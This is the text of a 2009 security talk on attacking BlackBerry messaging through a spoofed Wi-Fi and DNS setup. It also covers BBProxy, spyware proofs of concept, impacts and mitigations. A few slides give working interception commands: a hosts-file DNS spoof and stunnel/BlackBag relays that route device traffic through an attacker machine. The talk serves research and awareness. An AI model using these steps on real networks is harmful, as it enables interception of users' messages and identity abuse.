Attacking BlackBerry for phun and profit
y3dips[et]echo.or.id
Sunday, November 8, 2009
y3dips
• A Bandwidth Hunter ... A Renegade
• IT security fan for more than 7 years
• http://google.com/search?q=y3dips
BlackBerry
• Push Email
• Wireless Messaging System
• Phone, SMS, Cameras, Browsing
BlackBerry
• Photos
• Emails
• SMS
• Phone log
• Contacts
BlackBerry
• BlackBerry Enterprise Server (BES)
• BlackBerry Internet Service (BIS)
Diagram
http://smartphone.nttdocomo.co.jp/english/blackberrybold/blackberryservice/img/index/dgm_diagram.gif
BB Proxy
• Attacks the BES network
• Presented at Defcon 2006 by Jesse D'Aguanno
• Turns a BlackBerry device into a gateway to the internal network
Attacking Anatomy
[Diagram, built up over four slides: an Attacker on the INTERNET side of a Firewall; BB User, Apps Server and Server on the INTERNAL LAN. Captions added in sequence: "Connecting into Attacker Computer", "Connecting into App Server", "Device as a proxy", "Attacker 0wned Internal Network".]
Our Approach
• Attacking the Wi-Fi network
• DNS spoofing
• SSL tunneling - http://stunnel.org
• BlackBag - http://matasano.com
DNS Spoofing
• Spoof the DNS entry on the router/DNS server
# echo "133.7.133.7 rcp.ap.blackberry.com" >> /etc/hosts
Stunnel
• Set up two SSL connections
• SSL connection from the BB device to the attacker machine
• SSL connection from the attacker machine to the real BB server
# stunnel -d 443 -r localhost:8888
# stunnel -c -d 8889 -r 216.9.240.88:443
BlackBag
• Glue the tunnel back
# bkb replug -b localhost:8889@8888
Attacking Anatomy
[Diagram, built up over three slides, showing the RIM Network, a DNS Server, WIFI and "Attacker - 133.7.133.7". Labels: "search rcp.ap.blackberry.com"; "rcp.ap.blackberry.com 216.9.240.88"; "rcp.ap.blackberry.com 133.7.133.7". The last slide adds the port labels Tcp/443, Tcp/8888, Tcp/8889 and Tcp/443.]
Viewable
Result
• Clear Text Sender PIN
• Clear Text Recipient PIN
• Clear Text Message type
• Encrypted Data
Impact
• Spam? Up to DDoS
• PIN abuse, such as cloning
• Blackmail; identity theft, logs
• Email and PIN Mapping
Next
• More Data to analyze (different type)
• Attack the Encryption?
• Another infrastructure attack scenario
Confession
Raw Data
Mal(Spy)ware
• The Most Famous Etisalat Issue
• Firmware Update
• Reverse-engineered by some researchers
• 100% Spyware
POC
• Provided by Sheran Gunasekera @HITB 2009
• Bugs - Forwarding Emails
• PhoneSnoop - Turn your BB into a spy device
• http://chirashi.zensay.com
Bugs
Summary
• 0wned a blackberry with $20 (USD)
• Social Engineering rulez!
• BlackBerry User awareness
Case Stories
Mitigation
• Password Your Device
• Turn On Firewall
• Encrypt your Data/Media Card
• Control downloaded applications
• Protect GPS location
• Connect to legitimate Wi-Fi networks
References
• Attack Surface Analysis of BlackBerry Devices - Symantec
• BlackBerry: Call to Arms, some provided - Ftr & FX of Phenoelit
• BlackJacking: 0wning the Enterprise via BlackBerry - x30n
• Bugs & Kisses: Spying on BlackBerry Users for Fun - Sheran Gunasekera
• Seberapa Amankah Infrastruktur WIFI Blackberry device anda - y3dips & chopstick
Greetz
• Hermis Consulting
• Sheran Gunasekera
• Info Komputer